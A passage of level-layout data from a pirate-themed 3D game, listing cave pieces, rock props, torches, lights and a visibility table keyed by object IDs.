VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(375.0, -375.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611791.19akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWide200'}},'1235611791.19akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611791.2akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611791.19akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611955.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611791.19akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212352.0akelts4': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(169.589, 0.0, 0.0),'Pos': Point3(48.012, -45.202, -16.604),'Scale': VBase3(0.58, 0.58, 0.58),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_big'}},'1237583616.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.505, 0.0, 0.0),'Pos': Point3(28.898, -66.347, 12.965),'Scale': VBase3(0.825, 0.825, 1.22),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237583616.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-124.883, 0.0, 3.919),'Pos': Point3(58.36, -28.88, -17.767),'Scale': VBase3(2.911, 2.911, 3.412),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_a'}}},'Pos': Point3(375.0, -375.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611791.19akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200'}},'1235611792.13akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611792.14akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611792.13akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611967.94akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611792.13akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212352.0akelts2': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-20.989, 0.0, 0.0),'Pos': Point3(-24.748, -160.786, 1.068),'Scale': VBase3(1.017, 1.017, 1.017),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1236212352.0akelts3': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-52.528, 0.0, 0.0),'Pos': Point3(16.345, -67.753, 0.403),'Scale': VBase3(1.563, 1.563, 1.563),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237582592.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(158.293, 0.0, 0.0),'Pos': Point3(16.471, -54.976, 0.357),'Scale': VBase3(1.311, 1.311, 1.311),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1237582592.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(68.293, -15.86, -180.0),'Pos': Point3(-17.386, -100.494, 57.428),'Scale': VBase3(1.277, 0.64, 0.64),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_e'}}},'Pos': Point3(275.0, -275.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611792.13akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWide200'}},'1235611793.08akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611793.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611793.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611988.31akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611793.08akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212480.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.103, 0.0, 0.0),'Pos': Point3(43.667, -49.461, -3.709),'Scale': VBase3(6.811, 6.811, 18.866),'VisSize': 'Large','VisZone': '0_1235611793.08akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1237583744.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-98.576, 0.0, 4.28),'Pos': Point3(6.853, -96.042, -9.479),'Scale': VBase3(6.811, 6.811, 12.098),'VisSize': 'Large','VisZone': '1_1235611793.08akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}}},'Pos': Point3(125.0, -625.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611788.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200'}},'1235611794.03akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611794.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611794.03akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(25.0, -525.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611793.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend150_lava'}},'1235611795.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611795.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611795.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-200.0, -400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611784.77akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611795.97akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611795.98akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611795.97akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611804.13akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611795.97akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584000.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(180.0, 0.0, 0.0),'Pos': Point3(1.126, -31.448, 0.0),'Scale': VBase3(1.525, 1.525, 1.525),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237594240.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(24.387, 0.0, 0.0),'Pos': Point3(29.653, -33.939, -6.739),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1237594240.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-171.729, 0.0, 0.0),'Pos': Point3(-26.552, -25.42, -5.106),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1237594240.0akelts2': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-28.797, 0.0, 162.218),'Pos': Point3(-11.732, -37.045, 58.326),'Scale': VBase3(0.9, 0.9, 0.9),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-75.0, -275.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611119.02akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1236292864.0akelts': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': '0.5000','Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Intensity': '1.0000','LightType': 'AMBIENT','Pos': Point3(-11.228, -110.444, 352.706),'Scale': VBase3(22.068, 22.068, 22.068),'VisSize': '','Visual': {'Color': (0.13, 0.29, 0.44, 1.0),'Model': 'models/props/light_tool_bulb'}},'1236293632.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1236293632.0akelts0': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236293632.0akelts1': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts','Pos': Point3(0.0, -150.0, 41.991),'Scale': VBase3(1.0, 1.0, 1.0)},'1236294016.0akelts': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-16.137, -149.339, 43.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1236293632.0akelts','Visual': {'Model': 'models/props/torch'}}},'Pos': Point3(525.0, 75.0, 241.991),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowAscend'}},'1236293632.0akelts2': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1236293632.0akelts3': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts2','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237573940.19akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1237573962.13akelts': {'Type': 'Locator Node','Name': 'portal_interior_2','Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1237573940.19akelts','Pos': Point3(-0.303, -0.429, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-0.252, -73.084, 3.505),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts2','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}}},'Pos': Point3(525.0, 225.0, 283.982),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow75_entrance'}},'1237584256.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-121.45, 0.0, 0.0),'Pos': Point3(-291.061, 183.864, 241.003),'Scale': VBase3(2.636, 2.636, 3.142),'VisSize': 'Large','VisZone': '0_1235611530.73akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1238122156.47kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.393, 0.0, 0.0),'Pos': Point3(-165.059, 44.035, 228.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238122886.85kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(151.984, 0.925, 0.761),'Pos': Point3(-198.959, 227.009, 219.067),'Scale': VBase3(1.965, 1.371, 1.912),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1238123165.21kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-83.78, 105.396, 201.451),'Scale': VBase3(1.194, 1.194, 1.194),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238123307.1kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-149.543, 0.0, 0.0),'Pos': Point3(133.169, 82.732, 200.138),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238123315.1kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-62.644, 0.0, 0.0),'Pos': Point3(133.646, 66.069, 200.134),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238124386.78kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(355.282, 299.703, 199.533),'Scale': VBase3(0.674, 0.674, 0.674),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_sml'}}},'Visibility': 'Grid','Visual': {'Model': 'models/misc/pir_m_are_cav_startingPlane'}}},'Vis Table': {'0_1235611035.98akelts': ([], ['1235611119.33akelts', '1235611119.91akelts', '1235611035.98akelts', '1235611121.0akelts', '1235611792.13akelts', '1235611117.31akelts', '1235611120.45akelts', '1235611519.63akelts', '1237588864.0akelts', '1237584512.0akelts', '1237594368.0akelts', '1237574022.48akelts', '1235611119.02akelts', '1237590784.0akelts', '1235611061.09akelts', '1237588608.0akelts', '1237590912.0akelts', '1237588864.0akelts0', '1237582208.0akelts'], []),'0_1235611061.09akelts': ([], ['1235611035.98akelts', '1235611119.33akelts', '1235611119.91akelts', '1235611119.02akelts', '1235611117.05akelts', '1235611061.09akelts', '1235611792.13akelts', '1235611121.0akelts', '1235611117.31akelts', '1237574022.48akelts', '1237594368.0akelts', '1237574300.08akelts', '1237584512.0akelts', '1237588864.0akelts', '1237588608.0akelts', '1235611120.45akelts'], []),'0_1235611115.91akelts': ([], ['1235611115.91akelts', '1235611116.59akelts', '1235611121.0akelts', '1237573872.64akelts'], []),'0_1235611116.59akelts': ([], ['1235611115.91akelts', '1235611116.59akelts'], []),'0_1235611117.05akelts': ([], ['1235611117.05akelts', '1235611035.98akelts', '1237574300.08akelts', '1235611061.09akelts', '1235611121.0akelts', '1237588608.0akelts', '1237574022.48akelts', '1237594240.0akelts1', '1237590784.0akelts', '1235611119.02akelts', '1237594240.0akelts0', '1237584000.0akelts0', '1235611795.97akelts', '1237594368.0akelts', '1235611117.69akelts', '1237582208.0akelts', '1235611119.33akelts'], []),'0_1235611117.31akelts': ([], ['1237574022.48akelts', '1235611117.31akelts', '1235611121.0akelts', '1237574300.08akelts', '1235611035.98akelts', '1235611061.09akelts', '1237588608.0akelts', '1235611117.05akelts', '1237590784.0akelts', '1237594368.0akelts', '1235611117.69akelts', '1235611119.02akelts', '1237594240.0akelts1'], []),'0_1235611117.69akelts': ([], ['1235611117.69akelts', '1236293632.0akelts', '1236293632.0akelts2', '1237573940.19akelts', '1235611117.31akelts'], []),'0_1235611119.02akelts': ([], ['1235611119.02akelts', '1235611035.98akelts', '1236212352.0akelts2', '1235611792.13akelts', '1236212352.0akelts3', '1235611117.31akelts', '1235611117.05akelts', '1237590784.0akelts', '1237574300.08akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611119.33akelts', '1237590912.0akelts', '1237582208.0akelts', '1237594240.0akelts0', '1237584000.0akelts0', '1235611795.97akelts', '1237594240.0akelts1', '1237594240.0akelts2', '1237582592.0akelts0', '1235611775.94akelts', '1237594112.0akelts0'], []),'0_1235611119.33akelts': ([], ['1237588864.0akelts', '1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237574300.08akelts', '1235611119.02akelts', '1237574022.48akelts', '1237590784.0akelts', '1237582208.0akelts', '1235611061.09akelts', '1235611121.0akelts', '1237590912.0akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1235611792.13akelts'], []),'0_1235611119.91akelts': ([], ['1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611119.91akelts', '1237588864.0akelts', '1235611119.33akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1237590912.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1237574022.48akelts', '1237574300.08akelts', '1237590784.0akelts'], []),'0_1235611120.45akelts': ([], ['1235611361.5akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611534.09akelts', '1237827221.59akelts', '1237827053.79akelts', '1235611352.94akelts', '1237827026.68akelts', '1237827104.49akelts', '1237827147.39akelts', '1237827576.62akelts', '1237827472.21akelts', '1235611347.08akelts'], []),'0_1235611121.0akelts': ([], ['1235611061.09akelts', '1235611115.91akelts', '1235611035.98akelts', '1235611121.0akelts', '1237574022.48akelts'], []),'0_1235611344.81akelts': ([], ['1235611353.63akelts', '1237827546.46akelts', '1237827026.68akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827511.65akelts'], []),'0_1235611347.08akelts': ([], ['1235611347.08akelts', '1235611348.2akelts', '1237827026.68akelts', '1237827221.59akelts', '1235611352.94akelts', '1235611361.5akelts', '1237827576.62akelts', '1235611120.45akelts'], []),'0_1235611348.2akelts': ([], ['1235611348.83akelts', '1235611348.2akelts', '1235611347.08akelts', '1237827576.62akelts', '1235611361.5akelts', '1237827026.68akelts'], []),'0_1235611348.83akelts': ([], ['1235611348.2akelts', '1235611347.08akelts'], []),'0_1235611352.23akelts': ([], ['1235611353.63akelts', '1237827546.46akelts', '1237827511.65akelts'], []),'0_1235611352.94akelts': ([], ['1235611344.81akelts', '1237827472.21akelts', '1235611353.63akelts', '1235611352.94akelts', '1237827511.65akelts', '1237827053.79akelts', '1235611534.09akelts', '1237827026.68akelts', '1235611361.5akelts', '1237827221.59akelts', '1235611120.45akelts', '1237827147.39akelts'], []),'0_1235611353.63akelts': ([], ['1237827546.46akelts', '1235611344.81akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827026.68akelts', '1235611353.63akelts', '1237827511.65akelts', '1235611352.23akelts'], []),'0_1235611361.5akelts': ([], ['1235611348.2akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827147.39akelts', '1235611120.45akelts', '1235611534.09akelts', '1237827221.59akelts', '1237827026.68akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827104.49akelts', '1237827472.21akelts'], []),'0_1235611519.63akelts': ([], ['1235611119.33akelts', '1235611530.08akelts', '1237590912.0akelts', '1237591040.0akelts', '1235611119.91akelts', '1237588864.0akelts', '1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611035.98akelts', '1237574300.08akelts'], []),'0_1235611528.14akelts': ([], ['1237595008.0akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611528.78akelts', '1235611534.09akelts', '1237827104.49akelts', '1237584384.0akelts', '1235611529.42akelts', '1235611746.08akelts'], []),'0_1235611528.78akelts': ([], ['1237584384.0akelts', '1235611746.08akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237584384.0akelts0', '1237595136.0akelts'], []),'0_1235611529.42akelts': ([], ['1235611529.42akelts', '1237584384.0akelts', '1235611746.08akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611533.41akelts', '1235611532.06akelts', '1235611532.73akelts', '1237828412.73akelts'], []),'0_1235611530.08akelts': ([], ['1235611530.08akelts', '1235611530.73akelts', '1237591040.0akelts', '1235611519.63akelts', '1235611531.39akelts', '1237584256.0akelts', '1237584256.0akelts0', '1237584256.0akelts1', '1237587968.0akelts'], []),'0_1235611530.73akelts': ([], ['1235611530.08akelts', '1235611530.73akelts', '1237587968.0akelts', '1235611531.39akelts', '1237584256.0akelts', '1237584256.0akelts1', '1237591040.0akelts', '1235611519.63akelts'], []),'0_1235611531.39akelts': ([], ['1237584256.0akelts0', '1237584256.0akelts', '1235611530.73akelts', '1235611531.39akelts', '1235611530.08akelts', '1235611532.73akelts', '1235611533.41akelts', '1237584256.0akelts1', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611532.06akelts': ([], ['1235611531.39akelts', '1235611530.73akelts', '1237584256.0akelts1', '1235611532.06akelts', '1235611533.41akelts', '1235611746.08akelts', '1235611529.42akelts', '1235611532.73akelts', '1237584256.0akelts', '1237828366.56akelts', '1237828412.73akelts', '1237828348.45akelts'], []),'0_1235611532.73akelts': ([], ['1235611532.06akelts', '1235611533.41akelts', '1235611746.08akelts', '1235611531.39akelts', '1235611532.73akelts', '1235611530.73akelts', '1237828412.73akelts', '1235611529.42akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611533.41akelts': ([], ['1235611532.73akelts', '1235611532.06akelts', '1237828412.73akelts', '1235611746.08akelts', '1235611529.42akelts', '1237584384.0akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611534.09akelts': ([], ['1235611534.09akelts', '1235611528.14akelts', '1237827104.49akelts', '1235611352.94akelts', '1237827026.68akelts', '1237827053.79akelts', '1235611361.5akelts', '1237827221.59akelts', '1237827576.62akelts', '1235611120.45akelts', '1237827472.21akelts', '1237827147.39akelts', '1235611344.81akelts'], []),'0_1235611746.08akelts': ([], ['1235611533.41akelts', '1235611528.78akelts', '1237584384.0akelts', '1235611529.42akelts', '1237595136.0akelts', '1235611532.06akelts', '1237828412.73akelts'], []),'0_1235611775.94akelts': ([], ['1237593984.0akelts1', '1237593984.0akelts', '1235611782.08akelts', '1237593984.0akelts0', '1235611795.97akelts', '1237594112.0akelts0', '1235611777.48akelts', '1235611787.47akelts'], []),'0_1235611777.48akelts': ([], ['1237594112.0akelts', '1235611781.22akelts', '1235611795.0akelts', '1235611784.77akelts', '1237593984.0akelts1', '1237593984.0akelts', '1237593984.0akelts0'], []),'0_1235611781.22akelts': ([], ['1235611781.22akelts', '1235611777.48akelts', '1237594112.0akelts', '1235611784.77akelts', '1237593984.0akelts1', '1235611787.47akelts', '1235611775.94akelts', '1235611795.0akelts'], []),'0_1235611782.08akelts': ([], ['1237583872.0akelts', '1235611789.31akelts', '1237584000.0akelts', '1237593600.0akelts', '1237593728.0akelts', '1235611783.0akelts', '1235611788.39akelts', '1237593856.0akelts0', '1235611786.56akelts', '1235611787.47akelts', '1235611783.89akelts', '1237583872.0akelts0'], []),'0_1235611783.0akelts': ([], ['1235611785.67akelts', '1235611783.89akelts', '1235611782.08akelts', '1237583872.0akelts', '1237593856.0akelts0', '1237593728.0akelts', '1237584000.0akelts', '1235611786.56akelts', '1235611788.39akelts', '1235611793.08akelts', '1237583872.0akelts0'], []),'0_1235611783.89akelts': ([], ['1235611783.0akelts', '1237593856.0akelts0', '1237593728.0akelts', '1237584000.0akelts', '1237583872.0akelts'], []),'0_1235611784.77akelts': ([], ['1237593984.0akelts', '1235611782.08akelts', '1235611777.48akelts', '1235611781.22akelts', '1237594112.0akelts', '1235611787.47akelts', '1237593984.0akelts1'], []),'0_1235611785.67akelts': ([], ['1235611783.89akelts', '1235611785.67akelts', '1235611783.0akelts', '1237583872.0akelts0', '1237593856.0akelts0', '1237584000.0akelts', '1237593728.0akelts'], []),'0_1235611786.56akelts': ([], ['1235611788.39akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611793.08akelts', '1237583872.0akelts', '1235611782.08akelts', '1237584000.0akelts', '1237593728.0akelts', '1237593856.0akelts0', '1235611783.0akelts', '1236212480.0akelts1'], []),'0_1235611787.47akelts': ([], ['1235611777.48akelts', '1235611784.77akelts', '1235611795.0akelts', '1237594112.0akelts', '1235611787.47akelts', '1237593984.0akelts1', '1235611775.94akelts', '1237593984.0akelts', '1235611782.08akelts', '1237593984.0akelts0', '1235611781.22akelts'], []),'0_1235611788.39akelts': ([], ['1235611793.08akelts', '1237583744.0akelts', '1236212480.0akelts1', '1235611794.03akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611786.56akelts', '1237593728.0akelts', '1235611783.0akelts', '1237584000.0akelts', '1237593856.0akelts0', '1235611782.08akelts'], []),'0_1235611789.31akelts': ([], ['1235611789.31akelts', '1235611788.39akelts', '1235611786.56akelts', '1237593600.0akelts', '1235611791.19akelts', '1235611790.25akelts', '1236212352.0akelts4', '1237583616.0akelts', '1237583616.0akelts0'], []),'0_1235611790.25akelts': ([], ['1236212352.0akelts4', '1237583616.0akelts', '1237583616.0akelts0', '1235611790.25akelts', '1235611791.19akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611792.13akelts'], []),'0_1235611791.19akelts': ([], ['1235611792.13akelts', '1236212352.0akelts4', '1237583616.0akelts0', '1237583616.0akelts', '1235611789.31akelts', '1236212352.0akelts2', '1236212352.0akelts3', '1237582592.0akelts0', '1237582592.0akelts'], []),'0_1235611792.13akelts': ([], ['1237582592.0akelts', '1236212352.0akelts3', '1237582592.0akelts0', '1235611119.02akelts', '1236212352.0akelts2', '1235611795.97akelts', '1237582208.0akelts', '1237594240.0akelts0', '1236212352.0akelts4', '1235611791.19akelts', '1237583616.0akelts0', '1235611790.25akelts', '1237583616.0akelts'], []),'0_1235611793.08akelts': ([], ['1235611793.08akelts', '1237583744.0akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611789.31akelts', '1235611786.56akelts', '1235611794.03akelts'], []),'0_1235611794.03akelts': ([], ['1235611794.03akelts', '1237583744.0akelts', '1235611793.08akelts', '1236212480.0akelts1', '1235611788.39akelts'], []),'0_1235611795.0akelts': ([], ['1235611795.0akelts', '1235611784.77akelts', '1235611777.48akelts', '1237593984.0akelts', '1235611782.08akelts', '1235611787.47akelts'], []),'0_1235611795.97akelts': ([], ['1235611795.97akelts', '1237594240.0akelts1', '1237584000.0akelts0', '1235611775.94akelts', '1237594112.0akelts0', '1237594240.0akelts0', '1235611119.02akelts', '1237582208.0akelts', '1236212352.0akelts2', '1235611792.13akelts', '1237582592.0akelts0', '1236212352.0akelts3', '1235611791.19akelts', '1235611117.05akelts', '1235611035.98akelts', '1237590784.0akelts', '1237574300.08akelts'], []),'0_1236293632.0akelts': ([], ['1236293632.0akelts2', '1237573940.19akelts'], []),'0_1236293632.0akelts2': ([], ['1236293632.0akelts2', '1236293632.0akelts', '1235611117.69akelts'], []),'1_1235611035.98akelts': ([], ['1235611035.98akelts', '1235611117.31akelts', '1235611117.05akelts', '1235611119.91akelts', '1235611119.33akelts', '1235611061.09akelts', '1235611121.0akelts', '1235611119.02akelts', '1235611792.13akelts', '1237588608.0akelts', '1237590912.0akelts', '1237574300.08akelts', '1237594368.0akelts', '1237588864.0akelts', '1237584512.0akelts', '1237590784.0akelts'], []),'1_1235611061.09akelts': ([], ['1235611035.98akelts', '1235611061.09akelts', '1235611119.91akelts', '1235611121.0akelts', '1235611792.13akelts', '1235611117.05akelts', '1235611117.31akelts', '1237574022.48akelts', '1237594368.0akelts', '1237574300.08akelts', '1237588608.0akelts', '1237588864.0akelts', '1237584512.0akelts', '1235611115.91akelts', '1235611119.33akelts', '1235611119.02akelts', '1235611120.45akelts'], []),'1_1235611115.91akelts': ([], ['1235611115.91akelts', '1235611116.59akelts', '1235611121.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1237573872.64akelts', '1237588608.0akelts'], []),'1_1235611117.05akelts': ([], ['1235611117.05akelts', '1237594240.0akelts1', '1235611035.98akelts', '1235611119.02akelts', '1237590784.0akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611121.0akelts', '1237588608.0akelts', '1237574300.08akelts', '1235611117.31akelts', '1237594368.0akelts', '1235611117.69akelts', '1235611795.97akelts', '1237594240.0akelts0', '1237584000.0akelts0'], []),'1_1235611117.31akelts': ([], ['1237594368.0akelts', '1235611035.98akelts', '1237574022.48akelts', '1235611117.05akelts', '1237574300.08akelts', '1235611117.69akelts', '1235611117.31akelts', '1235611061.09akelts', '1235611121.0akelts', '1237590784.0akelts', '1237588608.0akelts'], []),'1_1235611117.69akelts': ([], ['1235611117.69akelts', '1235611117.31akelts', '1236293632.0akelts', '1237573940.19akelts', '1236293632.0akelts2', '1237594368.0akelts'], []),'1_1235611119.02akelts': ([], ['1237594112.0akelts0', '1237584000.0akelts0', '1237594240.0akelts0', '1235611775.94akelts', '1237594240.0akelts1', '1237594240.0akelts2', '1237590784.0akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611035.98akelts', '1237582208.0akelts', '1237574022.48akelts', '1237574300.08akelts', '1235611119.33akelts', '1236212352.0akelts2', '1235611792.13akelts', 